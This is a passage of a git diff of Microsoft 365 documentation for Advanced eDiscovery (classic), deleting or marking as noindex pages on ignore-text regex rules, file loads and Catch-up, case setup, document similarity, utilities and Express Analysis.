-The Ignore Text feature can be applied to all or any of the following Advanced eDiscovery modules: Analyze (Near-duplicates, Email Threads, Themes) and Relevance. Ignored text will not appear in files displayed in Relevance, and the analysis/calculations will discard the ignored text.
-
-If the Ignore Text feature was previously defined for modules that have already run, the Ignore Text setting will now be protected from being modified. However, the Ignore Text feature for the Relevance module can still be changed at any time.
-
-## How Ignore Text filters are applied
-
-Multiple Ignore Text filters are applied in the order that they were entered. To change the order in which they are applied, they must be deleted and re-entered in the desired order.
-
-For example, if the text content is: "DAVE BOB ALICE CAROL EVE", the following are samples of Ignore Text entries and the results these entries produce:
-
-|**Ignore Text entries** <br/> |**Results** <br/> |
-|:-----|:-----|
-|"ALICE", "BOB CAROL" <br/> |"DAVE EVE" <br/> |
-|"ALICE", "BOB ALICE CAROL" <br/> |"DAVE BOB CAROL EVE" <br/> |
-
-The second Ignore Text entry is not implemented because the string is not found as such AFTER the first Ignore Text has been applied.
-
-## Use regular expressions when defining Ignore Text
-
-Regular expressions are supported for use when defining Ignore Text. The following are examples of regular expression syntax and usage:
-
-- To remove (ignore) text from Begin until the end of a line:
-
- `Begin(.*)$`
-
- where "Begin" is the initial occurrence of this string in the line.
-
- For example, for the following text:
-
- **"This is first sentence and first line**
-
- **This is second sentence and second line"**
-
- the Regular Expression first(.\*)$ will result in:
-
- **"This is**
-
- **This is second sentence and second line"**
-
-- To remove disclaimers and legal statements automatically inserted at the end of email threads:
-
- `Begin(.|\s)*End`
-
- where "Begin" and "End" are unique strings at the beginning and end of a wrapped text paragraph.
-
- For example, the following regular expression will remove disclaimers and legal statements that were in the email thread between the Begin and End strings:
-
- **This message contains confidential information (.|\s)\*If verification is required please request a hard-copy version**
-
-- To remove a disclaimer (including special characters):
-
- For example, for the following text (with the disclaimer represented here by x's):
-
- **/\*\ This message contains confidential information. xxxx xxxx**
-
- **xxxx xxxx xxxx xxxx xxxx xxxx xxxx**
-
- **xxxx xxxx If verification is required, please request a hard-copy version. /\*\**
-
- the regular expression to remove the above disclaimer should be:
-
- **\/\\*\\ This message contains confidential information\.(.|\s)\* If verification is required please request a hard-copy version\. \/\\*\\**
-
-- Regular expression rules:
-
- - Any characters that are not part of the alphabet except for space(s), "_" and "-" must be preceded by "\".
-
- - The regular eExpression field can be unlimited length.
-
-> [!TIP]
-> For an explanation and detailed syntax of regular expressions, see: [Regular Expression Language - Quick Reference](https://msdn.microsoft.com/library/az24scfc%28v=vs.110%29.aspx).
-
-## Define Ignore Text rule
-
-1. In the **Manage \> Analyze \> Analyze options** tab, in the **Ignore Text** section, click the **+** icon to add a rule.
-
-2. In the **Add Ignore Text** dialog, in the **Name** field, type a name for the Ignore Text rule.
-
- ![Add ignored text](../media/98e5129b-2667-4692-86fa-2d0117187a7f.png)
-
-3. In the **Text** box, type the text to be ignored. The text field allows an unlimited number of characters.
-
- > [!TIP]
- > As shown in the window above, click **light bulb** to see common syntax guidelines for the Ignore Text rule.
-
-4. Select the **Case sensitive** check box, if desired.
-
-5. In the **Apply to** list, select the Advanced eDiscovery modules in which to apply the definition.
-
-6. If you want a test run on sample text, type sample text in the **Input** text box and click **Test**. The results are displayed in the **Output** text box.
-
-7. Click **OK** to save the Ignore Text rule. The defined Ignore Text rule is displayed.
-
- ![Set ignored text name](../media/3a788ac3-4a1c-46c9-89bd-7ff32d68ce23.png)
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Understanding document similarity](understand-document-similarity-in-advanced-ediscovery.md)
-
-[Setting Analyze options](set-analyze-options-in-advanced-ediscovery.md)
-
-[Setting Analyze advanced settings](set-analyze-advanced-settings-in-advanced-ediscovery.md)
-
-[Viewing Analyze results](view-analyze-results-in-advanced-ediscovery.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/set-up-loads-to-add-imported-files https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/set-up-loads-to-add-imported-files.md deleted file mode 100644
@@ -1,141 +0,0 @@
-title: "Set up loads to add imported files in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 9/14/2017
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: 0e0a9d04-294f-4f54-8bf1-b32d81345126
-description: "Review the steps to add imported files to the last defined load, or batch, of files before performing Relevance training in Advanced eDiscovery."
-
-# Set up loads to add imported files in Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-In Advanced eDiscovery, a load is a new batch of files added to a case. By default, one load is defined and all imported files are added to it. Before performing Relevance training, imported files must be added to the load.
-
-Consider the following scenarios:
-
-- New files are known to be similar to the previous files loaded to the case database, or the previous load of files was a random set from the file collection. In this instance, add the imported files to the current file load.
-
-- New files are different from previous ones (for example, from a different source), or you have no prior knowledge that they're similar or different to the previous loads. In this scenario, add the imported files to a new file load. Advanced eDiscovery recognizes this as a Rolling loads scenario, invokes a Catch-up process, locks Relevance training and Batch calculations until Catch-up is completed, and the new load is integrated and trained.
-
-## Adding imported files to the current load
-
-All imported files must be added to a load to be processed in Advanced eDiscovery. Imported files are added to the last defined load. If you import additional files later, they also must be added to the load.
-
-1. In the **Relevance \> Relevance setup** tab, select **Loads**.
-
- ![Relevance Setup Loads tab](../media/278aac7f-655f-462f-852a-6baa5d818768.png)
-
-2. **Include files**: Select an option for files to include. By default, adding files to the current load is based on the "All files" population.
-
- > [!TIP]
- > Load all available culled files into Relevance. If you plan to load only a subset of the available files, please first consult with Support, as loading subsets can adversely affect Relevance training.
-
-3. In **Loads management**, select a load.
-
-4. Click **Add files**. The files are added to the load and a confirmation message is displayed.
-
-5. Click **OK**.
-
-The files can now be processed in Advanced eDiscovery Relevance for training the files.
-
-## Editing a load name within a case
-
-If changing the load name, it is recommended to use a name that is significant to the case.
-
-1. In the **Relevance \> Relevance setup** tab, select **Loads**.
-
-2. From the **Loads management** list, select a load and click the **Edit** icon. The Edit load window is displayed.
-
-3. Enter the changes, and then click **OK**.
-
-## Adding imported files to a new load
-
-After starting Relevance training or performing Batch calculation, you may want to import and process an additional set of files.
-
-During Catch-up, you can create, tag, and analyze the Catch-up set. Advanced eDiscovery compares its assessment of Relevant and Non-Relevant files in the new load to those in previous loads. Based on the results, you are prompted to make Catch-up decisions, if necessary, and Advanced eDiscovery provides recommendations based on the accrued Relevance information.
-
-Rolling Loads and Catch-up functionality varies as follows:
-
-- When you import a new file load after Batch calculation, Advanced eDiscovery determines to what extent the files fall into one of the following categories:
-
- - Similar (homogeneous): A new, custom round of Relevance training is not required and the knowledge accrued from the previous load can be applied "as is" to the new load.
-
- - Distinct (heterogeneous): A new, custom round of Relevance training is required, and the knowledge accrued from the previous load cannot be applied.
-
- These terms refer to the level of similarity of files between loads and not within the loads.
-
-- When importing a new file load during Relevance training (before Batch calculation), Catch-up enables you to continue Relevance training on the united file set. Advanced eDiscovery does not estimate whether the new load is similar to or distinct from the previous load. It simply collects information about the new load and enables Relevance training to continue on the new and previous sets of files.
-
-- When there are multiple issues in Relevance training as well as issues after Batch calculation, the Catch-up process is performed once for all issues, and the results are calculated and displayed for each issue.
-
-> [!NOTE]
-> The size of the Catch-up sample may vary. It depends on the size of the new load relative to the previous loads, and on the number of samples completed before adding the new load. The Catch-up sample is typically a set of 200 to 2,000 files from the new load.
-
-> [!TIP]
-> Catch-up stops any other tasks and requires individual file tagging and review. Therefore, you can reduce overhead when you add new files in large batches.
-
-## Adding a new file load using Catch-up and Rolling loads
-
-1. In the **Relevance \> Relevance setup** tab, select **Loads**.
-
-2. Under **Loads management**, click the **+** icon to add a load. A confirmation message is displayed.
-
-3. Click **Yes** to continue. The **Add new load** dialog is displayed.
-
- > [!NOTE]
- > You can only add a new load if actions were performed to the previous load.
-
-4. In the **Add new load** dialog, type information in **Load name** and **Description** and then click **OK**. Advanced eDiscovery adds a new load.
-
-5. To import the new load file, click **Add files**. All new files are added to this load. After Advanced eDiscovery imports the files, it recognizes the Rolling loads scenario and indicates Catch-up as the next step.
-
-6. Click **Catch-up** at the bottom of the dialog to run the scenario.
-
- A single Catch-up set, typically containing 200 to 2,000 files from the new load, is created for all issues to allow concurrent file tagging.
-
- Details are provided about whether loads are similar or distinct, whether Advanced eDiscovery merged or split the loads automatically, and information regarding processing in the next step.
-
- You can then tag files and run a calculate operation. The tagging enables Relevance to determine if loads are similar or distinct and enables you to continue working on the new set of files.
-
-7. After the Catch-up set is reviewed, view **Relevance \> Track** for the Catch-up results.
-
-1. If the new file load was added during Relevance training (meaning, the issue has not yet gone through Batch calculation), **Continue training** is the next step, regardless of the Catch-up results.
-
- The new and previous loads are processed as one load and Relevance training continues on the united set. You are now finished with this procedure and can continue Relevance training.
-
-2. If the new load was added after Batch calculation, proceed to the following steps.
-
-8. For new loads added after Batch calculation, Advanced eDiscovery determines if the new load is similar to or distinct from previous loads, as follows:
-
-1. If loads were found to be similar: No additional Relevance training is necessary. The dashboard shows the recommended next step is to run ** Batch calculation ** again to calculate Relevance scores for the new load. Loads were found to be similar, so the previous classifier analysis can be run on the new files.
-
-2. If loads were found to be distinct: More Relevance training is necessary and the next step is Catch-up decision. Select a Catch-up decision as follows:
-
- If you select **Merge loads**, Advanced eDiscovery merges previous and new loads for the training set. Although the first load went through Batch calculation, more training is needed. Continue training new and previous loads together. Batch calculation will then run again and the previous Batch calculation scores should be ignored. Choose this selection when Relevance scores for existing loads can be recalculated, for example, when review of existing file loads has not started.
-
- If you select **Split loads**, continue Relevance training only on the new load. In this instance, previous Batch calculation scores will remain as is. Choose this option when existing Relevance scores for existing loads cannot be recalculated, for example, if review of existing loads has already started. Relevance scores are managed separately from this point onward and cannot be merged.
-
-3. Click **Continue training**.
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Defining issues and assigning users](define-issues-and-assign-users.md)
-
-[Defining highlighted keywords and advanced options](define-highlighted-keywords-and-advanced-options.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/set-up-users-and-cases-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/set-up-users-and-cases-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,63 +0,0 @@
-title: Set up users and cases in Advanced eDiscovery
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-ms.date:
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: 60ffd80b-4376-419d-b6e4-a72029b9907c
-description: "Learn how to configure user roles, create cases, and assign users to cases in Advanced eDiscovery."
-ms.custom: seo-marvel-apr2020
-
-# Set up users and cases in Advanced eDiscovery (classic)
-
-This topic describes how to set up users and cases for Advanced eDiscovery (classic).
-
-> [!IMPORTANT]
-> As we continue to invest in newer versions of Advanced eDiscovery, we are announcing the retirement of Advanced eDiscovery, also known as *Advanced eDiscovery (classic)* or *Advanced eDiscovery v1.0*. If you're still using Advanced eDiscovery v1.0, please transition to [Advanced eDiscovery v2.0](overview-ediscovery-20.md) (also known as the *Advanced eDiscovery solution in Microsoft 365*) as soon as possible. Advanced eDiscovery 2.0 contains similar functionality found in Advanced eDiscovery v1.0, but also offers many new features such as custodian management, communications management, and review sets. To learn more about the retirement of Advanced eDiscovery v1.0, see [Retirement of legacy eDiscovery tools](legacy-ediscovery-retirement.md#advanced-ediscovery-v10).
-
-## Requirements to set up users and cases
-
-Before setting up cases and users in Advanced eDiscovery, the following is required:
-
-- To analyze a user's data using Advanced eDiscovery, the user (the custodian of the data) must be assigned an Office 365 E5 license. Alternatively, users with an Office 365 E1 or E3 license can be assigned an Advanced eDiscovery standalone license. Administrators and compliance officers who are assigned to cases and use Advanced eDiscovery to analyze data don't need an E5 license.
-
-- You have to be a member of the eDiscovery Manager role group in the Security &amp; Compliance Center to create an eDiscovery case and add members to it. To add yourself to the eDiscovery Manager role group in Security &amp; Compliance Center, you have to be a global administrator in your organization. If you're not a global administrator, you 'll have to ask a global administrator to add you to the eDiscovery Manager role group. For more information, see:
-
- - [Permissions in the Microsoft 365 Security &amp; Compliance Center](~/security/office-365-security/protect-against-threats.md)
-
- - [Assign eDiscovery permissions in the MicrosoftΓÇì 365 Security &amp; Compliance Center](assign-ediscovery-permissions.md)
-
-## Step 1: Assign users eDiscovery permissions
-
-The first step is to assign users the requirement permissions in the Security &amp; Compliance Center so that they can me added as a member of an eDiscovery case. After a user is added as a member of a case in the Security &amp; Compliance Center, they'll be able to access the case in Advanced eDiscovery.
-
-To assign a user the necessary permissions so they can be added as a member of an eDiscovery case, see Step 1 in [eDiscovery cases in the Microsoft 365 Security &amp; Compliance Center](ediscovery-cases.md#step-1-assign-ediscovery-permissions-to-potential-case-members).
-
-## Step 2: Create an eDiscovery case and add members
-
-The next step is to create a new eDiscovery case in the Security & Compliance Center and add members. Members of the case will then be able to access the case in Advanced eDiscovery.
-
-1. To create a new eDiscovery case, see Step 3 in [Get started with Core eDiscovery](get-started-core-ediscovery.md#step-3-create-a-core-ediscovery-case).
-
-2. To add members to an eDiscovery case, see Step 4 in [Get started with Core eDiscovery](get-started-core-ediscovery.md#step-4-optional-add-members-to-a-core-ediscovery-case)
-
-## Step 3: Go a case in Advanced eDiscovery
-
-After you create an eDiscovery case and add members, you (or any member of the case) can access the corresponding case in Advanced eDiscovery. To access a case in Advanced eDiscovery, see [Accessing a case in Advanced eDiscovery](quick-setup-for-advanced-ediscovery.md#accessing-a-case-in-advanced-ediscovery).
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Preparing data for Advanced eDiscovery (classic)](prepare-data-for-advanced-ediscovery.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/tagging-and-assessment-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/tagging-and-assessment-in-advanced-ediscovery.md
@@ -15,6 +15,7 @@ search.appverid:
- MOE150 - MET150 ms.assetid: b5c82de7-ed2f-4cc6-becd-db403faf4d18
+ROBOTS: NOINDEX, NOFOLLOW
description: "Review the steps to perform Assessment training, including tagging files, and reviewing assessment results in Advanced eDiscovery." ---
@@ -117,18 +118,4 @@ In the absence of statistically based stabilization, there will be results with
> [!TIP] > In the **Relevance \> Track** tab, expanded issue display, the following viewing options are available: > The recommended next step, such as **Next step: Tagging** can be bypassed (per issue) by clicking the **Modify** button to its right, and then selecting an different step in the **Next step**. When the assessment progress indicator has not completed, assessment will be the next recommended option, to tag more assessment files and increase statistics accuracy. > You can change the error margin and assess its impact, by clicking **Modify**, and in the **Assessment level dialog**, changing the **Target error margin for recall estimates**, and clicking **Update values**. Also, in this dialog, you can view advanced options, by clicking **Advanced**. > You can view additional assessment level statistics and their impact by clicking **View**. In the displayed Detail results dialog, statistics are available per issue, when there are at least 500 tagged assessment files and at least 18 files are tagged as Relevant for the issue.
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Understanding Assessment in Relevance](assessment-in-relevance-in-advanced-ediscovery.md)
-
-[Tagging and Relevance training](tagging-and-relevance-training-in-advanced-ediscovery.md)
-
-[Tracking Relevance analysis](track-relevance-analysis-in-advanced-ediscovery.md)
-
-[Deciding based on the results](decision-based-on-the-results-in-advanced-ediscovery.md)
-
-[Testing Relevance analysis](test-relevance-analysis-in-advanced-ediscovery.md)
-
+
\ No newline at end of file
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/tagging-and-relevance-training-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/tagging-and-relevance-training-in-advanced-ediscovery.md
@@ -15,6 +15,7 @@ search.appverid:
- MOE150 - MET150 ms.assetid: 8576cc86-d51b-4285-b54b-67184714cc62
+ROBOTS: NOINDEX, NOFOLLOW
description: "Learn the steps to tag and then work with a training sample of 40 files during the Relevance training stage of Advanced eDiscovery." ---
@@ -92,18 +93,4 @@ The sample files list allows you to view a list of the files in a training sampl
To navigate to the next file in the sample: Shift + \> To navigate to the last file in the sample: Shift + Ctrl + \>
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Understanding Assessment in Relevance](assessment-in-relevance-in-advanced-ediscovery.md)
-
-[Tagging and Assessment](tagging-and-assessment-in-advanced-ediscovery.md)
-
-[Tracking Relevance analysis](track-relevance-analysis-in-advanced-ediscovery.md)
-
-[Deciding based on the results](decision-based-on-the-results-in-advanced-ediscovery.md)
-
-[Testing Relevance analysis](test-relevance-analysis-in-advanced-ediscovery.md)
-
+
\ No newline at end of file
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/test-relevance-analysis-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/test-relevance-analysis-in-advanced-ediscovery.md
@@ -15,6 +15,7 @@ search.appverid:
- MOE150 - MET150 ms.assetid: 1b092f7c-ea55-44f5-b419-63f3458fd7e0
+ROBOTS: NOINDEX, NOFOLLOW
description: "Learn how to use the Test tab after Batch calculation in Advanced eDiscovery to test, compare, and validate the overall quality of processing." ---
@@ -104,18 +105,3 @@ The "Test the Slice" test performs testing similar to the "Test the Rest" test,
10. Review and tag each of the files in the **Relevance \> Tag** tab and when done, click **Calculate**. 11. In the Test tab, you can click **View results** to see the test results.
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Understanding Assessment in Relevance](assessment-in-relevance-in-advanced-ediscovery.md)
-
-[Tagging and Assessment](tagging-and-assessment-in-advanced-ediscovery.md)
-
-[Tagging and Relevance training](tagging-and-relevance-training-in-advanced-ediscovery.md)
-
-[Tracking Relevance analysis](track-relevance-analysis-in-advanced-ediscovery.md)
-
-[Deciding based on the results](decision-based-on-the-results-in-advanced-ediscovery.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/track-relevance-analysis-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/track-relevance-analysis-in-advanced-ediscovery.md
@@ -15,6 +15,7 @@ search.appverid:
- MOE150 - MET150 ms.assetid: 3ab1e2c3-28cf-4bf5-b0a8-c0222f32bdf5
+ROBOTS: NOINDEX, NOFOLLOW
description: "Learn how to view and interpret the Relevance training status and results for case issues in Advanced eDiscovery." ---
@@ -164,18 +165,3 @@ This view shows the following:
- **Recall**: Percentage of Relevant files in the review set. - **Distribution by relevance score**: Files in the dark gray display to the left are below the cutoff score. A tool-tip displays the Relevance score and the related percentage of files in the review file set in relation to the total files.
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Understanding Assessment in Relevance](assessment-in-relevance-in-advanced-ediscovery.md)
-
-[Performing and reviewing Assessment](tagging-and-assessment-in-advanced-ediscovery.md)
-
-[Performing Relevance training](tagging-and-relevance-training-in-advanced-ediscovery.md)
-
-[Making decisions based on the results](decision-based-on-the-results-in-advanced-ediscovery.md)
-
-[Testing Relevance analysis](test-relevance-analysis-in-advanced-ediscovery.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/understand-document-similarity-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/understand-document-similarity-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,65 +0,0 @@
-title: "Understand document similarity in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 09/14/2017
-audience: Admin
-ms.topic: conceptual
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: 4d4cb381-4c9a-4165-a455-609d525c7a88
-description: "Review how document Similarity value, the minimal level of resemblance for two files to be considered near-duplicates, works in Advanced eDiscovery."
-ms.custom: seo-marvel-apr2020
-
-# Understand document similarity in Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-In Advanced eDiscovery, Document Similarity is the minimal level of resemblance required for two documents to be considered as near-duplicates.
-
-> [!TIP]
-> For most business applications, it is recommended to use a Similarity value of 60%-75%. For very poor quality optical character recognition (OCR) material, lower Similarity values can be applied.
-
-> [!NOTE]
-> After it's set and run for a given case, the Similarity value cannot be changed.
-
-Within a Near-duplicate (ND) set, there may be documents with a level of resemblance below the Similarity threshold. For a document to join an ND set, there must be at least one document in the ND set with a level of resemblance exceeding the Similarity.
-
-For example, assume the Similarity is set to 80%, document F1 resembles document F2 at a level of 85%, and document F2 resembles document F3 at a level of 90%.
-
-However, document F1 may resemble document F3 at a level of only 70%, which is below the threshold. Nonetheless, in this example, documents F1, F2, and F3 all appear in the one ND set. Similarly, using a Similarity value of 80%, we may have created two sets, EquiSet-1 and EquiSet-2. EquiSet-1 contains documents E1 and E2. Equiset-2 contains documents F1, F2, and F3.
-
-The levels of resemblance are illustrated as follows:
-
-![Document similarity](../media/3907ea7d-e28a-4027-8fc3-be090dd39144.gif)
-
-Assume that another document, X1, is now inserted. The resemblance between X1 and E3 is 87%. Similarly, the resemblance between X1 and F1 is 92%. As a result, EquiSet -1, EquiSet -2, and X1 are now combined into one ND set.
-
-![Document Similarity](../media/d140d347-33d5-475a-af04-594a0f2ab13d.gif)
-
-> [!NOTE]
-> If any two documents are assigned to one ND set, they will remain together in the same ND set, even if additional documents are added to the set or if the sets are merged.
-
-After sets are merged, the Pivot document can change when new documents are added to a set.
-
-## Related topics
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Setting Analyze options](set-analyze-options-in-advanced-ediscovery.md)
-
-[Setting ignore text](set-ignore-text-in-advanced-ediscovery.md)
-
-[Setting Analyze advanced settings](set-analyze-advanced-settings-in-advanced-ediscovery.md)
-
-[Viewing Analyze results](view-analyze-results-in-advanced-ediscovery.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/use-advanced-ediscovery-utilities https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/use-advanced-ediscovery-utilities.md deleted file mode 100644
@@ -1,110 +0,0 @@
-title: "Use Advanced eDiscovery utilities"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 9/14/2017
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: 66ca9993-75f4-4724-aea2-5a0719b660c1
-description: "Learn about the utilities in Advanced eDiscovery, including case log, clear data, process errors, modify Relevance, and transparency analysis."
-
-# Use Advanced eDiscovery (classic) utilities
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-The utilities that are displayed and available in Advanced eDiscovery depend on context and user roles.
-
-## Case log
-
-The Case log provides a detailed list of application processing activities, which can be used for tracking, troubleshooting, and for addressing errors and warnings. The log can be generated and stored locally on the host or server, or sent directly to an email address.
-
-The log file can also be downloaded to the client's computer. The client download option may be enabled or disabled according to configuration and user role.
-
-1. In the menu bar, click the **Cogwheel** icon.
-
-2. In the **Settings and utilities \> Utilities** tab, select **Case log \> Setup**.
-
-3. Select the **Log level** as follows:
-
- - **Standard**: Includes the basic log data. This option is usually necessary for monitoring, and should be used unless recommended otherwise.
-
- - **Minimal**: Used for very large cases, and returns only the latest data.
-
-4. Click **Run Case log**. The log is generated and path is displayed. The task progress information for the current and last task is displayed in the Task status pane.
-
-## Clear data
-
-If it is necessary to delete or reinitialize case data, the database instance must be initialized. The Clear data utility deletes all specified entries from the case database, text files, case folder, and accumulated results. The function can only be performed by an administrator.
-
-> [!IMPORTANT]
-> This action is not reversible and will clear all Relevance tagging and analysis performed by the expert. Save a backup of data, if necessary. Use this option with extreme care. Deleting tagged and ranked files can impact the Relevance results.
-
-1. In the menu bar, click the **Cogwheel** icon.
-
-2. In the **Settings and utilities \> Utilities** tab, select **Clear data \> Setup**.
-
-3. Select an option for the information to initialize:
-
- - **Relevance**: Deletes all work done in Relevance, including definition of loads and association of files to loads. It deletes all samples and tagging.
-
- - **Near-duplicates and email threads**: Deletes all analysis information of near-duplicates and email threads.
-
- - **Themes**: Deletes themes-related data.
-
- - **Export history**: Deletes history information of Export batches.
-
-4. Click **Clear data**. The case data is cleared. The task progress information for the current and last task is displayed in the **Task status** pane.
-
-## Modify Relevance
-
-This section describes how to skip or roll back a Relevance sample.
-
-1. In the menu bar, click the **Cogwheel** icon.
-
-2. In the **Settings and utilities \> Utilities** tab, select **Modify relevance**.
-
-3. Select from the options:
-
- - **Skip current sample - for current user**: This will tag, as **Skip**, all untagged files in the open case sample of the user running the utility. Relevance processing will not be performed on files tagged as **Skip**.
-
- - **Skip current sample - all open samples**: This will tag, as **Skip**, all untagged files in all open samples for all users. This option is not recommended if users are currently tagging samples.
-
- - **Roll back last sample**: The last completed Relevance training sample will be rolled back, regardless of whether it is before or after the "Calculate" process. Rollback of a catch-up sample is not allowed.
-
-4. Click **Execute** to run.
-
-## Transparency analysis
-
-The Transparency analysis utility enables a detailed view of files and their assigned Relevance score. The report can be used as a sanity check or to compare the relevance of a file defined by a human reviewer as compared to the relevance assigned by Advanced eDiscovery.
-
-In addition to Relevance scores, Advanced eDiscovery calculates and assigns keyword weights that consider the keyword context. The same word in a file can be assigned different weights, depending on context and location. Each keyword is marked using an increasing scale of color intensity ranging from yellow to dark orange and varying shades of gray. Color coding is used to visually indicate the word's relative positive or negative contribution to the Relevance score.
-
-In a multiple-issue case scenario, a Transparency analysis report can be generated for each issue.
-
-1. In the menu bar, click the **Cogwheel** icon.
-
-2. In the **Settings and utilities \> Utilities** tab, select **Transparency analysis \> Setup**.
-
-3. In ** File ID **, enter the file ID of the file to process.
-
-4. In the **Issue** list, select the pertinent issue.
-
-5. Click **Transparency analysis**. Upon completion, the Transparency analysis report for the file is displayed, which shows how the marked keyword colors correlate to the overall Relevance score.
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Defining case and tenant settings](define-case-and-tenant-settings-in-advanced-ediscovery.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/use-express-analysis-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/use-express-analysis-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,132 +0,0 @@
-title: "Use Express Analysis in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 9/14/2017
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: 50580099-3dc0-44a1-a9b6-5ca6d396316b
-description: Learn how to run the Express analysis mode of Advanced eDiscovery and then export the results.
-ms.custom: seo-marvel-apr2020
-
-# Use Express Analysis in Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-You can use **Express analysis** to quickly analyze a case and export the results.
-
-You can use express analysis to calculate near-duplicates and email threads and calculate themes. You can also set certain parameters for themes, document similarity and the export files in the [Advanced settings for Express analysis](use-express-analysis-in-advanced-ediscovery.md#BK_AdvancedSettings).
-
-## Run Express analysis
-
-1. In the **Express analysis** (1) tab, select a container to enable the ** Express analysis ** (2), and **Advanced settings** buttons.
-
- ![Screenshot of the Express analysis page](../media/60009974-5d1f-4971-8ebe-e5ec74e7fd2a.jpg)
-
-2. Under **Analyze parameters**:
-
- - Check **Calculate near-duplicates and email threads** if you want to run the analysis. It is selected by default.
-
- - Check **Calculate Themes** to process all files and assign themes to them. It is selected by default.
-
-3. Under **Export destination**:
-
- - Check **Download to local machine** to download to your local computer.
-
- - If you check **Export to user-defined Azure blob** then you can also specify a container URL and SAS token.
-
- > [!NOTE]
- > Once an export package is stored to the user defined Azure blob, the data is no longer managed by Advanced eDiscovery. it is managed by the Azure blob. This means if you delete the case, the exported files will still remain on the Azure blob.
-
- - **Save SAS token for future export session**: If checked, the SAS token will be encrypted in the Advanced eDiscovery's internal database for future use.
-
- > [!NOTE]
- > Currently the SAS token expires after a month. If you try to download after more than a month you have to undo last session, then export again.
-
-4. To start the express analysis with default settings, choose **Express analysis**, and the **Task status** page will display
-
- On the **Task status** page you can expand the **Process**, **Analyze** and **Export** tabs to display details about the express run.
-
- ![Screenshot of Advanced eDiscovery Express analysis Task status page](../media/bf30ab02-9828-4a6d-a485-0babc2c49ae5.jpg)
-
-5. Choose the **Express analysis summary** page to list detailed information about the run.
-
- On the bottom of the **Express analysis summary** page, choose **Download last session** to download the analysis files tp your local computer. You will first have to download eDiscovery Export tool and paste the Export key to the eDiscovery Export tool.
-
